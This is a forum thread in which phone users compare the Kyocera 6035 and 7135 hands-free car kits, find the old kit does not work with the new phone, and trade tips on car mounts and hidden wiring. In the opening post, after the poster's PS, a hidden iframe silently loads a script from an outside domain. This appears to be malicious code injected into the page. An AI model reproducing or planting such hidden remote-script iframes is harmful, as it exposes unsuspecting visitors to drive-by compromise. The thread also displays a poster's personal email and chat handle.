+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

7135 vs 6035 Car hands free kit

From reading one of the FAQs, it looks like the hands free speaker/charger I'm using now with my 6035 will work with the 7135. At times though, the volume on it is a bit low. Does anyone know if this is better with the 7135 hands free kit? Any other advantages of upgrading? Thanks!

PS-- It is getting *very* difficult to keep reading all these posts and hold out for Verizon. Biggest concern is if something seriously goes wrong with the phone after buying from getconnected, and there is no one to return it to or exchange with....Sounds like there have already been a couple isolated issues....<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I read the 7 and 30 day return policy from Getconnected and was NOT comfortable. My credit card company (Discover) told me if I have a problem, they would dispute it for me once I send it back.

I'm hanging on to my current celll phone and m505 anyway.

Re: 7135 vs 6035 Car hands free kit

Apprears to me that the 6035 kit and the 7135 kit have different model numbers.

Does anyone who has the 7135 kit think it is a major upgrade from the speakerphone feature on the phone. I think the speakerphone feature is good for indoors, but in a car going 75mph...it just doesn't cut it.

Jeff

Originally posted by pdadoc
    From reading one of the FAQs, it looks like the hands free speaker/charger I'm using now with my 6035 will work with the 7135. At times though, the volume on it is a bit low. Does anyone know if this is better with the 7135 hands free kit? Any other advantages of upgrading? Thanks!

Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

I have the Qualcom handsfree kit for the car and the Kyoc car kit. I think the sound quality is better with the 7135 however I want to test the features some more of the old car kit. If you had it you know that you could plug in an earbud and just push a button to go private (i.e. use the earbud) or even mute. With the kyo car kit you have to plug and unplug the ear bug each time you get in and out. Not a big deal two connections v one but I liked the option as I had it rigged up w a temp mount for the 6035.

confused....

Originally posted by boinker
    I have the Qualcom handsfree kit for the car and the Kyoc car kit. I think the sound quality is better with the 7135 however I want to test the features some more of the old car kit. If you had it you know that you could plug in an earbud and just push a button to go private (i.e. use the earbud) or even mute. With the kyo car kit you have to plug and unplug the ear bug each time you get in and out. Not a big deal two connections v one but I liked the option as I had it rigged up w a temp mount for the 6035.
    By Qualcom kit, do you mean 6035 and by Kyoc Kit do you mean 7135?

The reason I ask is that if the 6035 kit DOES work on the 7135 I can get one at my local ALLTEL store for $49 bucks.

What is the difference between the kits??

Jeff
    Jeff
    Tampa FL

THe kit for the 6035 will work with the 7135

My handsfree kit (see pics) says Qualcomm on it and was bought for the 6035 from Kyocera. I just tried it and all it does is provide power. I could not hear anything from the speaker and when I tried to call they could not hear me. It worked with the 6035 a few days before I got the 7135 but now the 6035 is deactivated. So I can not say for sure (cannt do a proper scientific test with both phones) that the kit didnt break in the last few days but it is unlikely. All I can tell you is as of 10 minutes ago it didnt work (outside of being a car charger) on the 7135.
    Attached Files

conflicting reports

Originally posted by HoTSynC
    THe kit for the 6035 will work with the 7135
    There were so many conflicting reports I had to ask. And unless his kit broke...apparently it does NOT work.

Trust me I know SEARCH is my friend...I use it all the time. Note the length of time that I have been a member and the amount of posts that I have total...

cheers...

Jeff
    Jeff
    Tampa FL

still feel conflicted

I too am wondering about this. People have been reporting that it will work, but now we hear that it won't? Hotsync- have you used it?

Thanks!

Jeremy

Administrator
    i think hotsync should know..

Re: conflicting reports

Originally posted by djjefft
    Trust me I know SEARCH is my friend...I use it all the time. Note the length of time that I have been a member and the amount of posts that I have total...
    That is in my signature, not directed at anyone here.

Originally posted by marctronixx
    i think hotsync should know..
    Let me go grab mine and see (I don't use handsfree other than headsets, but I have one)

I stand so corrected Mine fails to function either.

I had some custom work done so the 6035 car kit became a more permanent addition to my car. Having to purchase the new car kit and having that customized adds some serious $ to the price...

custom work?

Originally posted by jpalay

I had some custom work done so the 6035 car kit became a more permanent addition to my car. Having to purchase the new car kit and having that customized adds some serious $ to the price...
    What kind of custom work have you had done to accomodate the 'portable' hands free kit to make it more permanent? I was thinking of doing the same.

Have any pics that you can share?

Also what kind of mount are you using (or planning on using) for the 7135?

I did a little (more) searching last night and found a company that seems to do some pretty good stuff.

The company name is Pavavise.
    http://www.panavise.com

They carry vehicle specific mounts: http://www.panavise.com/f/comm/indash/index.html

Pedastal mounts: http://www.panavise.com/f/comm/cell_slimline.html

and phone holders:
    http://www.panavise.com/f/comm/cell_portagrip2000.html

This has been my next quest. I do want to think about how the hands free kit will work with all of this, so if you have any advice about customization it would be appreciated.

Thanks
    Jeff
    Tampa FL

I had a local Denver shop (CarToys) do it for me. It cost me a C-Note, but IMHO it was worth every penny. I have an Audi A4, and I didn't want to have cords everywhere.

I will try to take some pics today and post them to this thread, but the gist of it is that the portable kit was disassembled, a custom piece was made to hid the speaker in the center console, power was tapped from the line running to the cig lighter, and the mike was run underneath the steering wheel and up the a-pillar covered by the headliner. It is very clean IMO. My only complaint is that sometimes I have to raise the center armrest to hear on the highway.

Regarding Panavise: I have used their stuff before with much success. This time, I had a cheap metal mount installed in the dash (again I will post pics later), and then I took a regular swivel belt clip, broke off the locking mechanism (allowing the phone to just "slip" in and out) and screwed it to the metal mount. It looks a little hokey in the car, but it is absolutely perfect functionally.

Thanks for answers- sounds like another $70 purchase coming. BTW, I also have my 6035 "portable" car kit semi-permanently installed. I have a Honda. I simply ran the mic wire from the speaker (cig lighter is in middle lower console- a good spot) under the front molding in the car (ie. the molding below the steering wheel), securing it with duck tape (what else), then up (and hidden in) the rubber molding along the left edge of the car (it., the molding that comes right up to the left front window). Then the mic just pokes out from the molding, in a pretty good position to talk while driving. Took about 10 minutes to do. I'm not sure if the 7135 hands free kit even has this wire... I see in the picture a mic that looks like it's directly attached to the unit, but there does also seem to be a clip on mic...

Administrator
    well it makes sense for the kyo geeks to not make the phone backwards compatible with their older accesories.. how can they make any extra money?

Originally posted by jpalay
    I had a local Denver shop (CarToys) do it for me. It cost me a C-Note, but IMHO it was worth every penny. I have an Audi A4, and I didn't want to have cords everywhere.

you know that in A4s, there is a built in speaker, mic, power, and mute for the factory radio, so you could have or still can have the kit actually wired into the vehicle harness, and it would mute the radio when a call comes in, go to www.audiworld.com to see the details, this is what I have done in the past with my motorola, nokia and now samsung HF kit, and is what I will do when I get the 7135 and HF kit. I have an S4 by the way.
    It sucks that they haven't made an installed HF kit with a custom cradle for the phone.

I too have been using either www.panavise.com and www.pro-fit-intl.com Vehicle specific mounts for years, and they provide a very profesional looking installation.

Jorge

Yeah, I knew that was there, but I didn't do it. I remember seeing the information on how to do it on Audiworld a while ago, but oh well...